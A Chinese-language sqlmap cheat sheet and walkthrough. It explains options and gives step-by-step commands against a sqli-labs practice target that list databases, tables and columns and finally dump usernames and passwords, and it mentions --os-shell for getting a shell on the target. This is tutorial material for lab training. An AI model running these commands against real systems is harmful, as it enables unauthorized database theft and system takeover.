sqlmap用法

一个好用的语法

sqlmap -r 1.txt --dbs -level=3 -risk=3 --batch -p "id" --proxy http://127.0.0.1:8080

-u                       检测注⼊点
--batch              所有选项默认
--dbs                  列出所有的库名
--current-user         当前连接数据库⽤户的名字
--current-db           当前数据库的名字
-D "mysql"        指定目标数据库为mysql
--tables                     列出数据库中所有的表名
-T "user"                   指定目标表名为'user'
--columns         列出所有的字段名
-C 'username,password'              指定目标字段
--dump                     列出字段内容
-r                        从文件中读取HTTP 请求
--os-shell                  在特定情况下，可以直接获得目标系统Shell
--level 3                    设置sqlmap 检测等级 3

使用方法
抓包获取请求包

将请求包内容全部放在1.txt文件在

python sqlmap.py -r 1.txt --dbs -level=3 -risk=3 --batch -p "id" --proxy http://127.0.0.1:8080
//-r 读取文件 这里1.txt 是读取请求包
//--dbs    列出所有数据库名
//-level=3 -risk=3    请求数据包的速度和类型 默认都为1
//-p "id"    告诉它哪个参数是注入点
//--proxy http://127.0.0.1:8080    

win11中使用sqlmap

python sqlmap.py -u http://10.4.7.142/sqli-labs-master/Less-1/?id=1
 python sqlmap.py -u http://10.4.7.142/sqli-labs-master/Less-1/?id=1 --batch    
 //--batch 是按照默认选项来，不需要在敲y了

python sqlmap.py -u http://10.4.7.142/sqli-labs-master/Less-1/?id=1 --batch --dbs
//--dbs 意思是列出所有数据库名

python sqlmap.py -u http://10.4.7.142/sqli-labs-master/Less-1/?id=1 --batch --current-db
//--current-db 参数的意思就是当前数据库名

python sqlmap.py -u http://10.4.7.142/sqli-labs-master/Less-1/?id=1 --batch -D "security" --tables
//-D "security" 指定数据库
//--tables 列出数据库中所有的表名

 python sqlmap.py -u http://10.4.7.142/sqli-labs-master/Less-1/?id=1 --batch -D "security" -T "users" --columns
 //-T "users"    指定表
 //--columns    查有哪些字段

python sqlmap.py -u http://10.4.7.142/sqli-labs-master/Less-1/?id=1 --batch -D "security" -T "users" -C "id,password,username" --dump
//-C "id,password,username"     指定目标字段
//--dump    列出字段内容